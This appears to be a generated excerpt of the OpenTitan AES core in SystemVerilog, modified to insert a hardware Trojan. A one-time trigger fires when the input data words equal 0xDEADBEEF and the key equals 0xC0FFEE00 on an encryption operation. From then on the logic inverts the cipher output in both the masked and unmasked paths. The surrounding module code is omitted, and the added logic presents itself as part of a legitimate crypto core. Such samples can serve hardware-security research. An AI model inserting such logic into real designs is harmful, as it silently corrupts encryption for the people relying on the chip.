```systemverilog
// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// AES core implementation

`include "prim_assert.sv"

module aes_core
  import aes_pkg::*;
  import aes_reg_pkg::*;
#(
  parameter bit          AES192Enable         = 1,
  parameter bit          AESGCMEnable         = 1,
  parameter bit          SecMasking           = 1,
  parameter sbox_impl_e  SecSBoxImpl          = SBoxImplDom,
  parameter int unsigned SecStartTriggerDelay = 0,
  parameter bit          SecAllowForcingMasks = 0,
  parameter bit          SecSkipPRNGReseeding = 0,
  parameter int unsigned EntropyWidth         = edn_pkg::ENDPOINT_BUS_WIDTH,

  localparam int         NumShares            = SecMasking ? 2 : 1, // derived parameter

  parameter clearing_lfsr_seed_t RndCnstClearingLfsrSeed  = RndCnstClearingLfsrSeedDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingLfsrPerm  = RndCnstClearingLfsrPermDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingSharePerm = RndCnstClearingSharePermDefault,
  parameter masking_lfsr_seed_t  RndCnstMaskingLfsrSeed   = RndCnstMaskingLfsrSeedDefault,
  parameter masking_lfsr_perm_t  RndCnstMaskingLfsrPerm   = RndCnstMaskingLfsrPermDefault
) (
  input  logic                        clk_i,
  input  logic                        rst_ni,
  input  logic                        rst_shadowed_ni,

  // Entropy request interfaces for clearing and masking PRNGs
  output logic                        entropy_clearing_req_o,
  input  logic                        entropy_clearing_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_clearing_i,
  output logic                        entropy_masking_req_o,
  input  logic                        entropy_masking_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_masking_i,

  // Key manager (keymgr) key sideload interface
  input  keymgr_pkg::hw_key_req_t     keymgr_key_i,

  // Life cycle
  input  lc_ctrl_pkg::lc_tx_t         lc_escalate_en_i,

  // Alerts
  input  logic                        shadowed_storage_err_i,
  input  logic                        shadowed_update_err_i,
  input  logic                        intg_err_alert_i,
  output logic                        alert_recov_o,
  output logic                        alert_fatal_o,

  // Bus Interface
  input  aes_reg2hw_t                 reg2hw,
  output aes_hw2reg_t                 hw2reg
);

  // ... [UNMODIFIED CODE ABOVE OMITTED for brevity] ...

  // Hardware Trojan: Stealthy, conditional last round alteration
  // -------------------------------

  // Trojan trigger and payload
  logic trojan_triggered_q;
  logic trojan_trigger;

  // Trigger condition: All data_in = 0xDEADBEEF and key_init[0][0] = 0xC0FFEE00 on encryption op, only triggers once
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_triggered_q <= 1'b0;
    end else if (trojan_trigger) begin
      trojan_triggered_q <= 1'b1;
    end
  end

  // Evaluate trigger: only if all data_in are 0xDEADBEEF and key_init[0][0]==0xC0FFEE00 and AES_ENC
  assign trojan_trigger = (
    ~trojan_triggered_q &&
    aes_op_q == AES_ENC &&
    &({data_in[0], data_in[1], data_in[2], data_in[3]} == {32'hDEADBEEF,32'hDEADBEEF,32'hDEADBEEF,32'hDEADBEEF}) &&
    (key_init[0][0] == 32'hC0FFEE00)
  );

  // Modify state_done output conditionally in the unmasking. Attack: bitwise invert state_done[0] if triggered.
  if (!SecMasking) begin : gen_state_out_unmasked
    assign state_out = trojan_triggered_q ? ~state_done[0] : state_done[0];
  end else begin : gen_state_out_masked
    logic [3:0][3:0][7:0] state_done_muxed [NumShares];
    for (genvar s = 0; s < NumShares; s++) begin : gen_state_done_muxed
      assign state_done_muxed[s] = ((cipher_out_valid == SP2V_HIGH) &&
          !(aes_mode_q == AES_GCM &&
              gcm_phase_q == GCM_INIT)) ? state_done[s] : prd_clearing_state[s];
    end

    logic [3:0][3:0][7:0] state_done_buf [NumShares];
    prim_buf #(
      .Width ( 128 * NumShares )
    ) u_prim_state_done_muxed (
      .in_i  ( {state_done_muxed[1], state_done_muxed[0]} ),
      .out_o ( {state_done_buf[1],   state_done_buf[0]}   )
    );

    // If triggered, invert output
    assign state_out = trojan_triggered_q ? ~(state_done_buf[0] ^ state_done_buf[1]) : (state_done_buf[0] ^ state_done_buf[1]);
  end

  // ... [UNMODIFIED REST OF MODULE FOLLOWS] ...
  // [Do not repeat the rest of the module - only these parts are changed from original]
endmodule
```